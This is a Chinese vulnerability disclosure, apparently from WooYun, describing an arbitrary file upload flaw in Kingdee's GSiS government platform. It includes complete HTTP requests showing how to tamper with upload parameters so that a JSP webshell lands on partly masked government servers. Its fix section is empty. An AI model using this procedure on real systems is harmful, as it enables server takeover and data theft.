金蝶政务GSiS服务平台通用上传漏洞

漏洞标题	金蝶政务GSiS服务平台通用上传漏洞
相关厂商	金蝶
漏洞作者	路人甲
提交时间	2014-07-22 19:57
公开时间	2014-10-20 19:58
漏洞类型	文件上传导致任意代码执行
危害等级	高
自评Rank	20
漏洞状态	厂商已经确认
Tags标签	任意文件上传

漏洞详情

问题：上传页面多数参数可控，导致任意文件上传,且有越权访问会员外功能问题。

收集到的案例有：

高平市政务中心

http://gk.sx******.gov.cn:8080/kdgs/

汉川政务中心

http://www.han****.gov.cn:8080/kdgs

等等

通杀所有金蝶GSIS

漏洞证明：

本次演示地址为：

http://gk.sx******.gov.cn:8080/kdgs

漏洞地址：http://gk.sx******.gov.cn:8080/kdgs/portal/share/upload/uploadFile.jsp

第一步：

注册并登录网站会员获取合法会话标识

注册地址

http://gk.sx******.gov.cn:8080/kdgs/biz/portal/user/regist.action?registUserType=

如果页面找不到注册按钮的可以直接替换页面找到注册地址。

第二步：

访问文件上传页面，利用burpsuite代理进行上传

正常上传POST请求为

code 区域

POST /kdgs/biz/portal/upload/upload.action HTTP/1.1

Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*

Referer: http://gk.sx******.gov.cn:8080/kdgs/portal/share/upload/uploadFile.jsp?path=ITEM_PATH&maximumSize=3145728&fileSaveMode=00&storeType=db&refreshTimestamp=1405994496640

Accept-Language: zh-cn

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)

Content-Type: multipart/form-data; boundary=---------------------------7def0302c2

Accept-Encoding: gzip, deflate

Host: gk.sx******.gov.cn:8080

Content-Length: 1502

Proxy-Connection: Keep-Alive

Pragma: no-cache

Cookie: JSESSIONID=B247935EBA2FB9FE9B4C4506A4646D45; __userType__cookie=INNER



-----------------------------7def0302c2

Content-Disposition: form-data; name="id"





-----------------------------7def0302c2

Content-Disposition: form-data; name="viewid"





-----------------------------7def0302c2

Content-Disposition: form-data; name="path"



ITEM_PATH

-----------------------------7def0302c2

Content-Disposition: form-data; name="fileSaveMode"



00

-----------------------------7def0302c2

Content-Disposition: form-data; name="uploadList_"





-----------------------------7def0302c2

Content-Disposition: form-data; name="fieldValue"





-----------------------------7def0302c2

Content-Disposition: form-data; name="allowedTypes"





-----------------------------7def0302c2

Content-Disposition: form-data; name="maximumSize"



3145728

-----------------------------7def0302c2

Content-Disposition: form-data; name="storeType"



db

-----------------------------7def0302c2

Content-Disposition: form-data; name="fieldid"





-----------------------------7def0302c2

Content-Disposition: form-data; name="file"; filename="3.gif"

Content-Type: image/gif



wooyun

-----------------------------7def0302c2

Content-Disposition: form-data; name="filename"



C:\fakepath\3.gif

-----------------------------7def0302c2

Content-Disposition: form-data; name="file"; filename=""

Content-Type: application/octet-stream





-----------------------------7def0302c2

Content-Disposition: form-data; name="filename"





-----------------------------7def0302c2--

修改storeType的值db为folder

修改filename的值为XX.jsp

修改后的POST数据包为

code 区域

POST /kdgs/biz/portal/upload/upload.action HTTP/1.1

Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*

Referer: http://gk.sx******.gov.cn:8080/kdgs/portal/share/upload/uploadFile.jsp?path=ITEM_PATH&maximumSize=3145728&fileSaveMode=00&storeType=db&refreshTimestamp=1405994496640

Accept-Language: zh-cn

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)

Content-Type: multipart/form-data; boundary=---------------------------7def0302c2

Accept-Encoding: gzip, deflate

Host: gk.sx******.gov.cn:8080

Content-Length: 1502

Proxy-Connection: Keep-Alive

Pragma: no-cache

Cookie: JSESSIONID=B247935EBA2FB9FE9B4C4506A4646D45; __userType__cookie=INNER



-----------------------------7def0302c2

Content-Disposition: form-data; name="id"





-----------------------------7def0302c2

Content-Disposition: form-data; name="viewid"





-----------------------------7def0302c2

Content-Disposition: form-data; name="path"



ITEM_PATH

-----------------------------7def0302c2

Content-Disposition: form-data; name="fileSaveMode"



00

-----------------------------7def0302c2

Content-Disposition: form-data; name="uploadList_"





-----------------------------7def0302c2

Content-Disposition: form-data; name="fieldValue"





-----------------------------7def0302c2

Content-Disposition: form-data; name="allowedTypes"





-----------------------------7def0302c2

Content-Disposition: form-data; name="maximumSize"



3145728

-----------------------------7def0302c2

Content-Disposition: form-data; name="storeType"



folder

-----------------------------7def0302c2

Content-Disposition: form-data; name="fieldid"





-----------------------------7def0302c2

Content-Disposition: form-data; name="file"; filename="3.gif"

Content-Type: image/gif



wooyun

-----------------------------7def0302c2

Content-Disposition: form-data; name="filename"



C:\fakepath\3.jsp

-----------------------------7def0302c2

Content-Disposition: form-data; name="file"; filename=""

Content-Type: application/octet-stream





-----------------------------7def0302c2

Content-Disposition: form-data; name="filename"





-----------------------------7def0302c2--

上传成功后得到

webshell地址为

http://gk.sx******.gov.cn:8080/kdgs/uploads/item/11e4-1165-d78d7b5a-ba69-331a1d69f888.jsp

11e4-1165-d78d7b5a-ba69-331a1d69f888.jsp是随机的，看burpsuite回显。

修复方案：

版权声明：转载请注明来源路人甲@乌云

转载请注明：安全脉搏 » 金蝶政务GSiS服务平台通用上传漏洞

漏洞详情

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

版权声明：转载请注明来源路人甲@乌云